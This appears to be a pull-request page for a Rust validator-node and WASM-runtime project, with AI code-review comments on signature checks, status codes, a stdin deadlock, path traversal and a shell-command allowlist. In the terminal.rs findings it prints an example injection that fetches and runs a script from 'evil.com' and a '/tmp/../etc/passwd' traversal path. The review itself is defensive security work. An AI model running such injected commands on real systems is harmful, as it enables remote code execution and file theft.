# Look for any network layer validation or message verification
find . -name "*.rs" -path "*/p2p*" -o -name "*.rs" -path "*/network*" 2>/dev/null | xargs grep -l "verify\|validate" 2>/dev/null | head -10

Repository: PlatformNetwork/platform-v2

Length of output: 344


🏁 Script executed:

#!/bin/bash
# Get the JobAssignmentMessage structure definition
grep -A20 "pub struct JobAssignmentMessage" crates/p2p-consensus/src/messages.rs

Repository: PlatformNetwork/platform-v2

Length of output: 740


🏁 Script executed:

#!/bin/bash
# Check the network.rs file for message validation/verification logic
cat crates/p2p-consensus/src/network.rs | head -200

Repository: PlatformNetwork/platform-v2

Length of output: 6307


🏁 Script executed:

#!/bin/bash
# Search for signature verification implementation
grep -rn "verify.*signature\|validate.*signature" crates/p2p-consensus/src/ 2>/dev/null

Repository: PlatformNetwork/platform-v2

Length of output: 877


🏁 Script executed:

#!/bin/bash
# Search for SignedP2PMessage definition and usage
grep -rn "SignedP2PMessage\|struct Signed" crates/p2p-consensus/src/messages.rs | head -20

Repository: PlatformNetwork/platform-v2

Length of output: 173


🏁 Script executed:

#!/bin/bash
# Look for where messages are validated after reception but before handler
grep -n "from_bytes\|deserialize\|receive\|handle_message" crates/p2p-consensus/src/network.rs | head -30

Repository: PlatformNetwork/platform-v2

Length of output: 574


🏁 Script executed:

#!/bin/bash
# Check if there's validation logic around message processing
grep -B5 -A10 "P2PMessage::JobAssignment\|verify_signature.*assignment\|assignment.*verify" bins/validator-node/src/main.rs

Repository: PlatformNetwork/platform-v2

Length of output: 824


🏁 Script executed:

#!/bin/bash
# Get the full SignedP2PMessage struct definition
sed -n '610,650p' crates/p2p-consensus/src/messages.rs

Repository: PlatformNetwork/platform-v2

Length of output: 1123


🏁 Script executed:

#!/bin/bash
# Check how messages are actually dispatched in the event loop - look around line 432
sed -n '420,450p' bins/validator-node/src/main.rs

Repository: PlatformNetwork/platform-v2

Length of output: 1355


🏁 Script executed:

#!/bin/bash
# Search for any validation or signature checks on P2PMessage before handler dispatch
grep -B10 "handle_network_event" bins/validator-node/src/main.rs | grep -E "verify|validate|signature|sign"

Repository: PlatformNetwork/platform-v2

Length of output: 53


🏁 Script executed:

#!/bin/bash
# Confirm the pattern - check if Submission handler also doesn't verify signature
sed -n '723,760p' bins/validator-node/src/main.rs

Repository: PlatformNetwork/platform-v2

Length of output: 1787


🏁 Script executed:

#!/bin/bash
# Check where SignedP2PMessage gets unwrapped/deserialized
grep -n "SignedP2PMessage\|verify.*signature" crates/p2p-consensus/src/network.rs | head -20

Repository: PlatformNetwork/platform-v2

Length of output: 405


🏁 Script executed:

#!/bin/bash
# Get the full verify_message implementation
sed -n '420,460p' crates/p2p-consensus/src/network.rs

Repository: PlatformNetwork/platform-v2

Length of output: 1549


🏁 Script executed:

#!/bin/bash
# Search for where verify_message is actually called
grep -rn "verify_message" crates/p2p-consensus/src/ bins/validator-node/src/

Repository: PlatformNetwork/platform-v2

Length of output: 263


🏁 Script executed:

#!/bin/bash
# Look at the message deserialization flow - line 446 onwards
sed -n '440,500p' crates/p2p-consensus/src/network.rs

Repository: PlatformNetwork/platform-v2

Length of output: 2485


Extract job assignment timeout to a named constant.

The assignment.timestamp + 300_000 is a hardcoded 5-minute timeout that should be extracted to a named constant for clarity and maintainability.

Signature verification is already handled at the network layer in handle_gossipsub_message(), which validates all incoming messages before they reach the handlers, so no additional verification is needed here.

Proposed constant extraction
+/// Default job assignment timeout in milliseconds (5 minutes)
+const JOB_ASSIGNMENT_TIMEOUT_MS: i64 = 300_000;
+
 // ... in the handler:
-                    timeout_at: assignment.timestamp + 300_000,
+                    timeout_at: assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS,
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@bins/validator-node/src/main.rs` around lines 836 - 855, Replace the
hardcoded 300_000 timeout in the JobAssignment handler with a named constant
(e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to improve clarity and maintainability: define
the constant near related types or at module scope and use it when computing
JobRecord.timeout_at (currently set as assignment.timestamp + 300_000) so it
becomes assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS; update any related
comments or docs and leave signature verification untouched since it's handled
in handle_gossipsub_message().

Comment on lines +874 to +897
P2PMessage::TaskProgress(progress) => {
debug!(
submission_id = %progress.submission_id,
challenge_id = %progress.challenge_id,
validator = %progress.validator.to_hex(),
task_index = progress.task_index,
total_tasks = progress.total_tasks,
progress_pct = progress.progress_pct,
"Received task progress"
);
let record = TaskProgressRecord {
submission_id: progress.submission_id.clone(),
challenge_id: progress.challenge_id,
validator: progress.validator,
task_index: progress.task_index,
total_tasks: progress.total_tasks,
status: progress.status,
progress_pct: progress.progress_pct,
updated_at: progress.timestamp,
};
state_manager.apply(|state| {
state.update_task_progress(record);
});
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

TaskProgress handler also processes state mutations without signature verification.

The TaskProgress handler creates a TaskProgressRecord and updates state via state.update_task_progress(record) without verifying the progress.signature. A malicious peer could forge progress updates for submissions it isn't assigned to evaluate.

Same guideline concern as the JobAssignment handler above.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@bins/validator-node/src/main.rs` around lines 874 - 897, The TaskProgress
handler is mutating state without verifying the progress.signature; before
calling state.update_task_progress (inside the P2PMessage::TaskProgress arm
where TaskProgressRecord is built), validate the signature on progress using the
validator's public key and a canonical serialization of the progress data (e.g.,
submission_id, challenge_id, task_index, total_tasks, status, progress_pct,
timestamp) and only call state_manager.apply/update_task_progress if signature
verification succeeds; if verification fails, log and discard the message.
Ensure you perform the check on progress.signature and use the existing
signature verification utility in the codebase (or add one) so the verification
occurs prior to creating/updating the TaskProgressRecord and invoking
state.update_task_progress.

Comment on lines +234 to +242
pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
let mut buf = vec![0u8; 65536];
let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
if status < 0 {
return Err(status);
}
buf.truncate(status as usize);
Ok(buf)
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Disabled status (positive 1) slips through the status < 0 error check, causing data corruption.

The host-side ConsensusHostStatus::Disabled has value 1 (positive). When the host returns 1 for a disabled consensus, these wrappers treat it as a successful response of 1 byte, truncating the zero-initialized buffer to a single byte and returning Ok(vec![0]). The caller will misinterpret garbage as valid validator/vote data.

This applies to host_consensus_get_validators and host_consensus_get_votes. The same class of bug exists for host_consensus_get_state_hash (Line 262) where status == 1 is treated as success, though the impact there is returning a zeroed hash rather than corrupt data.

🐛 Proposed fix: check for positive non-success status codes
 pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
     let mut buf = vec![0u8; 65536];
     let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
-    if status < 0 {
+    if status < 0 || status == 1 {
+        // 1 = Disabled
         return Err(status);
     }
     buf.truncate(status as usize);
     Ok(buf)
 }
 pub fn host_consensus_get_votes() -> Result<Vec<u8>, i32> {
     let mut buf = vec![0u8; 65536];
     let status = unsafe { consensus_get_votes(buf.as_mut_ptr() as i32, buf.len() as i32) };
-    if status < 0 {
+    if status < 0 || status == 1 {
+        // 1 = Disabled
         return Err(status);
     }
     buf.truncate(status as usize);
     Ok(buf)
 }

Alternatively, consider a more robust fix: change ConsensusHostStatus::Disabled to a negative value (e.g., -10) in consensus.rs so all non-success statuses are negative, aligning with the error-detection pattern used throughout the SDK. The same issue exists for TerminalHostStatus::Disabled = 1 in terminal.rs.

Also applies to: 252-260

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/challenge-sdk-wasm/src/host_functions.rs` around lines 234 - 242, The
wrappers host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash treat a returned status of 1
(ConsensusHostStatus::Disabled) as success and truncate the buffer; update each
function to treat status == 1 as an error (i.e., return Err(status)) rather than
truncating/returning data — only treat genuinely successful status values as
success (e.g., status > 1 for payload-returning calls), and keep the existing
negative-error check; change the conditional around the unsafe consensus_* call
in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.

Comment on lines +30 to +39
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum ConsensusHostStatus {
Success = 0,
Disabled = 1,
BufferTooSmall = -1,
ProposalLimitExceeded = -2,
InvalidArgument = -3,
InternalError = -100,
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Disabled = 1 (positive) is the root cause of the SDK-side data corruption bug.

ConsensusHostStatus::Disabled = 1 is the only non-success status with a positive value. This breaks the convention used by SDK wrappers (status < 0 → error). Functions returning buffer sizes (like handle_get_validators) will cause the SDK to misinterpret 1 as "1 byte written."

Consider making all non-success statuses negative, or at minimum, making Disabled negative.

🐛 Proposed fix
 pub enum ConsensusHostStatus {
     Success = 0,
-    Disabled = 1,
+    Disabled = -10,
     BufferTooSmall = -1,
     ProposalLimitExceeded = -2,
     InvalidArgument = -3,
     InternalError = -100,
 }

Update from_i32 accordingly:

     pub fn from_i32(code: i32) -> Self {
         match code {
             0 => Self::Success,
-            1 => Self::Disabled,
+            -10 => Self::Disabled,
             -1 => Self::BufferTooSmall,
             -2 => Self::ProposalLimitExceeded,
             -3 => Self::InvalidArgument,
             _ => Self::InternalError,
         }
     }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/consensus.rs` around lines 30 - 39, The
enum ConsensusHostStatus has a positive value for Disabled which breaks the SDK
convention that non-success statuses are negative; change
ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another unused
negative code) and update any conversion/mapper (e.g., from_i32 or match arms
that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.

Comment on lines +428 to +456
let mut child = cmd
.spawn()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;

if has_stdin {
if let Some(ref stdin_data) = request.stdin {
if let Some(ref mut stdin) = child.stdin {
use std::io::Write;
let _ = stdin.write_all(stdin_data);
}
}
child.stdin.take();
}

let output = loop {
if start.elapsed() > timeout {
let _ = child.kill();
return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
}
match child.try_wait() {
Ok(Some(_)) => {
break child
.wait_with_output()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
}
Ok(None) => std::thread::sleep(Duration::from_millis(10)),
Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
}
};
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Potential deadlock when writing stdin to a child process with piped stdout/stderr.

If the child process produces enough output to fill the OS pipe buffer for stdout/stderr before consuming all its stdin, write_all on line 436 will block waiting for the child to read, while the child is blocked waiting for us to read its stdout. This is a classic deadlock scenario with synchronous piped I/O (the Rust std::process docs warn about this). The timeout loop on lines 442–456 would never be reached.

Consider writing stdin in a separate thread, or using wait_with_output() (which handles the I/O concurrently) after spawning the child with stdin pre-written via a separate thread.

Sketch of a safer approach
-    let mut child = cmd
-        .spawn()
-        .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
-
-    if has_stdin {
-        if let Some(ref stdin_data) = request.stdin {
-            if let Some(ref mut stdin) = child.stdin {
-                use std::io::Write;
-                let _ = stdin.write_all(stdin_data);
-            }
-        }
-        child.stdin.take();
-    }
-
-    let output = loop {
-        if start.elapsed() > timeout {
-            let _ = child.kill();
-            return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
-        }
-        match child.try_wait() {
-            Ok(Some(_)) => {
-                break child
-                    .wait_with_output()
-                    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
-            }
-            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
-            Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
-        }
-    };
+    let mut child = cmd
+        .spawn()
+        .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
+
+    // Write stdin on a separate thread to avoid deadlock with piped stdout/stderr
+    if has_stdin {
+        let stdin_data = request.stdin.clone().unwrap_or_default();
+        let mut child_stdin = child.stdin.take().unwrap();
+        std::thread::spawn(move || {
+            use std::io::Write;
+            let _ = child_stdin.write_all(&stdin_data);
+            // child_stdin is dropped here, closing the pipe
+        });
+    }
+
+    let output = loop {
+        if start.elapsed() > timeout {
+            let _ = child.kill();
+            return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
+        }
+        match child.try_wait() {
+            Ok(Some(_)) => {
+                break child
+                    .wait_with_output()
+                    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
+            }
+            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
+            Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
+        }
+    };
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
let mut child = cmd
.spawn()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
if has_stdin {
if let Some(ref stdin_data) = request.stdin {
if let Some(ref mut stdin) = child.stdin {
use std::io::Write;
let _ = stdin.write_all(stdin_data);
}
}
child.stdin.take();
}
let output = loop {
if start.elapsed() > timeout {
let _ = child.kill();
return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
}
match child.try_wait() {
Ok(Some(_)) => {
break child
.wait_with_output()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
}
Ok(None) => std::thread::sleep(Duration::from_millis(10)),
Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
}
};
let mut child = cmd
.spawn()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
if has_stdin {
if let Some(ref stdin_data) = request.stdin {
if let Some(stdin) = child.stdin.take() {
let stdin_data = stdin_data.clone();
std::thread::spawn(move || {
use std::io::Write;
let mut stdin = stdin;
let _ = stdin.write_all(&stdin_data);
});
}
} else {
child.stdin.take();
}
}
let output = loop {
if start.elapsed() > timeout {
let _ = child.kill();
return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
}
match child.try_wait() {
Ok(Some(_)) => {
break child
.wait_with_output()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
}
Ok(None) => std::thread::sleep(Duration::from_millis(10)),
Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
}
};
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/sandbox.rs` around lines 428 - 456, The
current synchronous write_all to child.stdin after spawning (in the block
referencing cmd.spawn(), has_stdin, request.stdin, write_all and child.stdin)
can deadlock if the child fills stdout/stderr buffers before reading stdin; move
stdin writing off the main thread by spawning a dedicated thread to take
child.stdin, write_all the bytes, and then drop/close it (or use
wait_with_output which concurrently handles stdio) before entering the existing
timeout loop that polls child.try_wait() and uses wait_with_output; ensure the
writer thread is detached or joined appropriately and that errors from the write
are converted to SandboxExecError::ExecutionFailed so the timeout/kill logic
(start, timeout, child.kill, SandboxExecError::ExecutionTimeout) still functions
correctly.

Comment on lines +30 to +43
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum TerminalHostStatus {
Success = 0,
Disabled = 1,
CommandNotAllowed = -1,
PathNotAllowed = -2,
FileTooLarge = -3,
BufferTooSmall = -4,
IoError = -5,
LimitExceeded = -6,
Timeout = -7,
InternalError = -100,
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Disabled = 1 (positive) breaks the SDK's status < 0 error-detection pattern.

TerminalHostStatus::Disabled is set to 1, but SDK-side wrappers (e.g., host_terminal_exec) use status < 0 to detect errors. When terminal is disabled, the host returns 1, which the SDK interprets as "1 byte of data written successfully." Consider changing Disabled to a negative value to align with the error-detection convention.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 30 - 43,
TerminalHostStatus::Disabled is currently set to a positive value (1) which
breaks the SDK's error-detection pattern (status < 0); change the Disabled
variant in the TerminalHostStatus enum to a negative error code (e.g., -8 or
another unused negative value) so it is treated as an error by SDK wrappers like
host_terminal_exec, and update any related docs/tests/constants that assume the
old value.

Comment on lines +139 to +147
pub fn is_path_allowed(&self, path: &str) -> bool {
if !self.enabled {
return false;
}
if self.allowed_paths.is_empty() {
return true;
}
self.allowed_paths.iter().any(|p| path.starts_with(p))
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Critical: Path traversal via .. components bypasses is_path_allowed.

is_path_allowed uses a simple path.starts_with(p) check without canonicalizing the path. A WASM module can pass "/tmp/../etc/passwd" which passes the /tmp prefix check but resolves to /etc/passwd when std::fs::read is called.

Proposed fix: canonicalize before checking
     pub fn is_path_allowed(&self, path: &str) -> bool {
         if !self.enabled {
             return false;
         }
         if self.allowed_paths.is_empty() {
             return true;
         }
-        self.allowed_paths.iter().any(|p| path.starts_with(p))
+        // Canonicalize to resolve ".." and symlinks before checking the prefix
+        let canonical = match std::fs::canonicalize(path) {
+            Ok(p) => p,
+            // For write operations the file may not exist yet; resolve the parent
+            Err(_) => {
+                let parent = std::path::Path::new(path).parent();
+                match parent.and_then(|p| std::fs::canonicalize(p).ok()) {
+                    Some(p) => p,
+                    None => return false,
+                }
+            }
+        };
+        let canonical_str = canonical.to_string_lossy();
+        self.allowed_paths.iter().any(|p| canonical_str.starts_with(p))
     }

Also applies to: 397-409

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 139 - 147, The
is_path_allowed function currently checks prefixes with path.starts_with(p)
which allows path traversal like "/tmp/../etc/passwd"; change the check to
compare normalized/canonicalized paths: normalize the incoming path (resolve
"."/".." components and make it absolute) and normalize the stored allowed_paths
before comparison (or canonicalize both using std::fs::canonicalize where
possible), and on any canonicalization/error return false; update the same
prefix-check logic in the other occurrence of this permission check so
comparisons use normalized absolute paths rather than raw starts_with.

Comment on lines +283 to +375
fn handle_terminal_exec(
caller: &mut Caller<RuntimeState>,
cmd_ptr: i32,
cmd_len: i32,
result_ptr: i32,
result_len: i32,
) -> i32 {
let enabled = caller.data().terminal_state.policy.enabled;
if !enabled {
return TerminalHostStatus::Disabled.to_i32();
}

let cmd_bytes = match read_wasm_memory(caller, cmd_ptr, cmd_len) {
Ok(bytes) => bytes,
Err(err) => {
warn!(error = %err, "terminal_exec: failed to read command from wasm memory");
return TerminalHostStatus::InternalError.to_i32();
}
};

let cmd_str = match std::str::from_utf8(&cmd_bytes) {
Ok(s) => s.to_string(),
Err(_) => return TerminalHostStatus::InternalError.to_i32(),
};

let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();

{
let state = &caller.data().terminal_state;
if !state.policy.is_command_allowed(&command_name) {
warn!(
challenge_id = %state.challenge_id,
command = %command_name,
"terminal_exec: command not allowed"
);
return TerminalHostStatus::CommandNotAllowed.to_i32();
}
if state.executions >= state.policy.max_executions {
return TerminalHostStatus::LimitExceeded.to_i32();
}
}

let timeout_ms = caller.data().terminal_state.policy.timeout_ms;
let max_output = caller.data().terminal_state.policy.max_output_bytes;

let output = match Command::new("sh")
.arg("-c")
.arg(&cmd_str)
.stdin(std::process::Stdio::null())
.stdout(std::process::Stdio::piped())
.stderr(std::process::Stdio::piped())
.spawn()
{
Ok(child) => {
let start = std::time::Instant::now();
let timeout = Duration::from_millis(timeout_ms);
match child.wait_with_output() {
Ok(out) => {
if start.elapsed() > timeout {
return TerminalHostStatus::Timeout.to_i32();
}
out
}
Err(err) => {
warn!(error = %err, "terminal_exec: command wait failed");
return TerminalHostStatus::IoError.to_i32();
}
}
}
Err(err) => {
warn!(error = %err, "terminal_exec: command spawn failed");
return TerminalHostStatus::IoError.to_i32();
}
};

caller.data_mut().terminal_state.executions += 1;

let mut result_data = output.stdout;
if result_data.len() > max_output {
result_data.truncate(max_output);
}

if result_len < 0 || result_data.len() > result_len as usize {
return TerminalHostStatus::BufferTooSmall.to_i32();
}

if let Err(err) = write_wasm_memory(caller, result_ptr, &result_data) {
warn!(error = %err, "terminal_exec: failed to write result to wasm memory");
return TerminalHostStatus::InternalError.to_i32();
}

result_data.len() as i32
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Critical: Command allowlist is trivially bypassed and timeout is ineffective.

Two serious security issues in handle_terminal_exec:

  1. Allowlist bypass: Line 308 extracts only the first word as command_name, but lines 328-330 always execute via sh -c <entire_cmd_str>. A WASM module sending "echo; curl http://evil.com | sh" passes the check (since "echo" is allowed) but executes arbitrary shell commands. The allowlist provides no real protection.

  2. Blocking + ineffective timeout: child.wait_with_output() (line 339) blocks until the process exits. The timeout check at line 341 only runs after the process has already completed, so sleep 99999 will block the WASM host thread indefinitely. You need to use a tokio::process::Command with timeout, or poll the child in a loop with a deadline, or use child.try_wait() in a spin loop.

Sketch for a safer exec approach
-    let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();
+    // Parse the command properly: only allow direct execution of the binary,
+    // not shell interpretation. Reject commands containing shell metacharacters.
+    let parts: Vec<&str> = cmd_str.split_whitespace().collect();
+    let command_name = parts.first().copied().unwrap_or("");
 
     {
         let state = &caller.data().terminal_state;
         if !state.policy.is_command_allowed(&command_name) {
             // ...
         }
     }
 
-    let output = match Command::new("sh")
-        .arg("-c")
-        .arg(&cmd_str)
+    let output = match Command::new(command_name)
+        .args(&parts[1..])
         .stdin(std::process::Stdio::null())
         .stdout(std::process::Stdio::piped())
         .stderr(std::process::Stdio::piped())
         .spawn()

For timeout enforcement, use a polling loop with child.try_wait() or spawn the process on a background thread with a kill deadline.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 283 - 375,
handle_terminal_exec currently validates only the first token (command_name) but
then runs the entire cmd_str via "sh -c", and it blocks on
child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.

Comment on lines +565 to +600
fn handle_terminal_random_seed(
caller: &mut Caller<RuntimeState>,
buf_ptr: i32,
buf_len: i32,
) -> i32 {
if buf_len <= 0 {
return TerminalHostStatus::InternalError.to_i32();
}

let len = buf_len as usize;
let mut seed = vec![0u8; len];

// Use a deterministic seed based on challenge_id and timestamp for reproducibility
let challenge_id = caller.data().challenge_id.clone();
let ts = caller
.data()
.fixed_timestamp_ms
.unwrap_or_else(|| chrono::Utc::now().timestamp_millis());

use sha2::{Digest, Sha256};
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(ts.to_le_bytes());
let hash = hasher.finalize();

for (i, byte) in seed.iter_mut().enumerate() {
*byte = hash[i % 32];
}

if let Err(err) = write_wasm_memory(caller, buf_ptr, &seed) {
warn!(error = %err, "terminal_random_seed: failed to write to wasm memory");
return TerminalHostStatus::InternalError.to_i32();
}

TerminalHostStatus::Success.to_i32()
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

Random seed is not truly deterministic across validators for the same challenge.

handle_terminal_random_seed uses challenge_id + timestamp to derive a seed. When fixed_timestamp_ms is None, it falls back to chrono::Utc::now() (line 582), which will differ across validators and produce different seeds for the same challenge. This breaks the deterministic execution guarantee for challenges unless fixed_timestamp_ms is always set.

Additionally, the seed only varies by challenge_id and timestamp — calling it multiple times within the same millisecond returns the same bytes. Consider incorporating a call counter.

Based on learnings: "Challenge evaluation must execute deterministically within the WASM runtime sandbox."

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 565 - 600,
handle_terminal_random_seed currently uses chrono::Utc::now() when
fixed_timestamp_ms is None which yields non-deterministic seeds across
validators; change to only use deterministic inputs (challenge_id and a
deterministic per-call counter stored on RuntimeState) and fail if
fixed_timestamp_ms is not set or omit timestamp entirely. Specifically: in
handle_terminal_random_seed, remove the chrono::Utc fallback and instead read a
call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.

@echobt echobt closed this Feb 20, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant

Comments